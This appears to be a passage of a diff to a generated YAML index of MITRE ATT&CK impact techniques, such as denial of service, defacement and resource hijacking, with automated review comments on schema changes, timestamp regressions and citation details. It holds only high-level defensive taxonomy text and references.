+ url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1565.003:
+ technique:
+ modified: '2024-10-15T18:21:43.760Z'
name: Runtime Data Manipulation
description: |-
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -57081,11 +57836,17 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Inspect important application binary file hashes, locations,
and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'File: File Deletion'
@@ -57094,17 +57855,31 @@ impact:
- 'File: File Creation'
x_mitre_impact_type:
- Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ created: '2020-03-02T14:30:05.252Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/003
+ external_id: T1565.003
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1498.002:
technique:
- modified: '2023-03-30T21:01:41.052Z'
+ modified: '2024-10-15T16:04:34.495Z'
name: Reflection Amplification
description: |-
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
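Review bot: Runtime Data Manipulation (T1565.003) drops `x_mitre_permissions_required` (User, Administrator, root, SYSTEM) with no replacement anywhere in the rewritten object, so any filter or report that relied on that key silently loses the information. If the field is simply gone upstream, say so in the commit message; if it is not, it should be carried over.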
@@ -57113,6 +57888,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -57128,17 +57904,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Sensor Health: Host Status'
- 'Network Traffic: Network Traffic Flow'
@@ -57148,14 +57919,15 @@ impact:
id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
created: '2020-03-02T20:08:03.691Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1498/002
external_id: T1498.002
- - source_name: Cloudflare ReflectionDoS May 2017
- description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
- (attacks). Retrieved April 23, 2019.
- url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- source_name: Cloudflare DNSamplficationDoS
description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
April 23, 2019.
@@ -57164,28 +57936,28 @@ impact:
description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
April 23, 2019.
url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+ - source_name: Cloudflare ReflectionDoS May 2017
+ description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+ (attacks). Retrieved April 23, 2019.
+ url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cloudflare Memcrashed Feb 2018
+ description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+ - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+ url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- source_name: Arbor AnnualDoSreport Jan 2018
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
Infrastructure Security Report. Retrieved April 22, 2019.
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- - source_name: Cloudflare Memcrashed Feb 2018
- description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
- - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
- url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- - source_name: Cisco DoSdetectNetflow
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1499.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:05:48.014Z'
name: Service Exhaustion Flood
description: |-
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
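Review bot: the `- spec_version: '2.1'` removal in this hunk is repeated for every technique in the file with no replacement key, which changes the per-technique schema; check that nothing in the index generation or tests reads `technique.spec_version` before merging. Separately, the `Cloudflare ReflectionDoS May 2017` entry moved in here spells the author `Marek Majkowsk` while the `Cloudflare Memcrashed Feb 2018` entry directly below spells it `Marek Majkowski`; that is upstream citation text and should stay verbatim in generated YAML, but it is worth reporting upstream rather than hand-editing here.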
@@ -57196,7 +57968,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -57207,17 +57978,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -57254,7 +58020,8 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491:
technique:
@@ -57275,7 +58042,7 @@ impact:
- source_name: mitre-attack
external_id: T1491
url: https://attack.mitre.org/techniques/T1491
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:42.056Z'
name: Defacement
description: "Adversaries may modify visual content available internally or
externally to an enterprise network, thus affecting the integrity of the original
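Review bot: the `modified` timestamp for T1491 goes backwards in this hunk (`'2022-05-11T14:00:00.188Z'` to `'2022-03-25T19:34:42.056Z'`), and the same regression appears for T1491.001 (`2022-11-08` to `2022-07-28`) and T1486 (`2022-11-08` to `2022-06-16`) later in the diff, while every other object moves forward. A regressing `modified` value usually means the generator is reading a different field or a different STIX snapshot for objects that did not change in this release; please confirm the source bundle before merging, since consumers that use `modified` to detect updates will treat these objects as stale.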
@@ -57302,12 +58069,78 @@ impact:
x_mitre_impact_type:
- Integrity
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ atomic_tests: []
+ T1496.002:
+ technique:
+ modified: '2024-09-25T14:59:35.287Z'
+ name: Bandwidth Hijacking
+ description: "Adversaries may leverage the network bandwidth resources of co-opted
+ systems to complete resource-intensive tasks, which may impact system and/or
+ hosted service availability. \n\nAdversaries may also use malware that leverages
+ a system's network bandwidth as part of a botnet in order to facilitate [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+ to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+ in proxyjacking by selling use of the victims' network bandwidth and IP address
+ to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+ in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+ Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+ financial costs or availability disruptions, this technique may cause reputational
+ damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+ Proxyjacking)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - IaaS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'File: File Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Connection Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+ created: '2024-09-25T13:44:35.412Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/002
+ external_id: T1496.002
+ - source_name: Sysdig Proxyjacking
+ description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+ Chat. Retrieved July 6, 2023.
+ url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+ - source_name: Unit 42 Leaked Environment Variables 2024
+ description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+ Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+ Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+ url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+ - source_name: GoBotKR
+ description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+ Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+ url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1657:
technique:
- modified: '2024-04-11T20:22:14.359Z'
+ modified: '2024-10-15T15:58:10.254Z'
name: Financial Theft
description: "Adversaries may steal monetary resources from targets through
extortion, social engineering, technical theft, or other methods aimed at
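Review bot: the new T1496.002 object in this hunk carries `x_mitre_detection: ''` (as do T1496.004 and T1496.001 added below), whereas the older objects in this file have detection prose. If the markdown or index generators render that field, confirm they tolerate an empty string rather than a missing key; for these three sub-techniques the only detection guidance in the file is the listed `x_mitre_data_sources` (`Network Traffic: Network Traffic Flow`, `Process: Process Creation`, and so on), so a renderer that skips empty strings should still emit those.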
@@ -57340,7 +58173,7 @@ impact:
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -57350,10 +58183,9 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
@@ -57416,7 +58248,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1491.001:
technique:
@@ -57457,7 +58288,7 @@ impact:
messages. Since internally defacing systems exposes an adversary''s presence,
it often takes place after other intrusion goals have been accomplished.(Citation:
Novetta Blockbuster Destructive Malware)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-28T18:55:35.988Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Defacement: Internal Defacement'
x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -57478,9 +58309,157 @@ impact:
- Integrity
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1491.001
atomic_tests: []
+ T1496.004:
+ technique:
+ modified: '2024-10-16T17:59:27.535Z'
+ name: Cloud Service Hijacking
+ description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+ applications to complete resource-intensive tasks, which may impact hosted
+ service availability. \n\nFor example, adversaries may leverage email and
+ messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+ Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+ spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+ messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+ 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+ in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+ AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+ 2024)\n\nIn some cases, adversaries may leverage services that the victim
+ is already using. In others, particularly when the service is part of a larger
+ cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+ 2024) Leveraging SaaS applications may cause the victim to incur significant
+ financial costs, use up service quotas, and otherwise impact availability. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+ created: '2024-09-25T14:05:59.910Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/004
+ external_id: T1496.004
+ - source_name: SentinelLabs SNS Sender 2024
+ description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+ Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+ url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+ - source_name: Lacework LLMJacking 2024
+ description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+ with Composite Alerts. Retrieved September 25, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+ - source_name: Sysdig LLMJacking 2024
+ description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+ (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+ - source_name: Permiso SES Abuse 2023
+ description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+ 25, 2024.
+ url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.001:
+ technique:
+ modified: '2024-10-13T16:58:38.820Z'
+ name: Compute Hijacking
+ description: "Adversaries may leverage the compute resources of co-opted systems
+ to complete resource-intensive tasks, which may impact system and/or hosted
+ service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ is to validate transactions of cryptocurrency networks and earn virtual currency.
+ Adversaries may consume enough system resources to negatively impact and/or
+ cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+ Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+ because of the high potential for available resources, but user endpoint systems
+ may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+ environments may also be targeted due to the ease of deployment via exposed
+ APIs and the potential for scaling mining activities by deploying or compromising
+ multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+ Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+ cryptocurrency mining malware identify then kill off processes for competing
+ malware to ensure it’s not competing for resources.(Citation: Trend Micro
+ War of Crypto Miners)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Network Traffic: Network Connection Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Sensor Health: Host Status'
+ - 'Process: Process Creation'
+ - 'File: File Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+ created: '2024-09-25T13:34:30.100Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/001
+ external_id: T1496.001
+ - source_name: Unit 42 Hildegard Malware
+ description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+ Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+ url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+ - source_name: CloudSploit - Unused AWS Regions
+ description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+ Retrieved October 8, 2019.
+ url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+ - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+ description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+ 17, 2019.
+ url: https://securelist.com/lazarus-under-the-hood/77908/
+ - source_name: Trend Micro Exposed Docker APIs
+ description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+ via Exposed APIs. Retrieved April 6, 2021.
+ url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+ - source_name: Trend Micro War of Crypto Miners
+ description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+ Miners: A Battle for Resources. Retrieved April 6, 2021.'
+ url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1565:
technique:
modified: '2024-02-02T17:18:39.004Z'
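Review bot: the three new T1496 sub-techniques are inserted at unrelated positions (T1496.002 after T1491 in the earlier hunk, T1496.004 and T1496.001 between T1491.001 and T1565 here), which shows the generator emits techniques in dictionary order rather than sorted by ID. Emitting the `impact:` mapping sorted by technique ID would keep sub-techniques next to their parent and make future regenerations reviewable; as written, a reviewer has to search the whole diff to check which of T1496.001 through T1496.004 actually landed.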
@@ -57533,11 +58512,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1531:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:35:13.577Z'
name: Account Access Removal
description: "Adversaries may interrupt availability of system and network resources
by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -57560,6 +58538,7 @@ impact:
phase_name: impact
x_mitre_contributors:
- Hubert Mank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -57577,9 +58556,10 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- x_mitre_version: '1.2'
+ - IaaS
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
@@ -57605,9 +58585,8 @@ impact:
url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1531
atomic_tests: []
T1486:
@@ -57694,7 +58673,7 @@ impact:
NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
Part 1)"
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T13:07:10.318Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data Encrypted for Impact
x_mitre_detection: |-
@@ -57718,12 +58697,11 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1486
atomic_tests: []
T1499:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:56:47.424Z'
name: Endpoint Denial of Service
description: |
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -57742,7 +58720,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
@@ -57759,18 +58736,13 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '1.1'
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
@@ -57794,8 +58766,8 @@ impact:
- source_name: FSISAC FraudNetDoS September 2012
description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- source_name: ArsTechnica Great Firewall of China
description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -57815,33 +58787,22 @@ impact:
url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1496:
technique:
- modified: '2024-02-14T21:00:00.467Z'
+ modified: '2024-10-13T17:00:09.759Z'
name: Resource Hijacking
description: "Adversaries may leverage the resources of co-opted systems to
complete resource-intensive tasks, which may impact system and/or hosted service
- availability. \n\nOne common purpose for Resource Hijacking is to validate
- transactions of cryptocurrency networks and earn virtual currency. Adversaries
- may consume enough system resources to negatively impact and/or cause affected
- machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
- Blog 2017) Servers and cloud-based systems are common targets because of the
- high potential for available resources, but user endpoint systems may also
- be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
- CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
- due to the ease of deployment via exposed APIs and the potential for scaling
- mining activities by deploying or compromising multiple containers within
- an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
- Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
- malware identify then kill off processes for competing malware to ensure it’s
- not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
- may also use malware that leverages a system's network bandwidth as part of
- a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
- campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
- they may engage in proxyjacking by selling use of the victims' network bandwidth
- and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+ availability. \n\nResource hijacking may take a number of different forms.
+ For example, adversaries may:\n\n* Leverage compute resources in order to
+ mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+ SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+ quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+ types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+ 2023)"
kill_chain_phases:
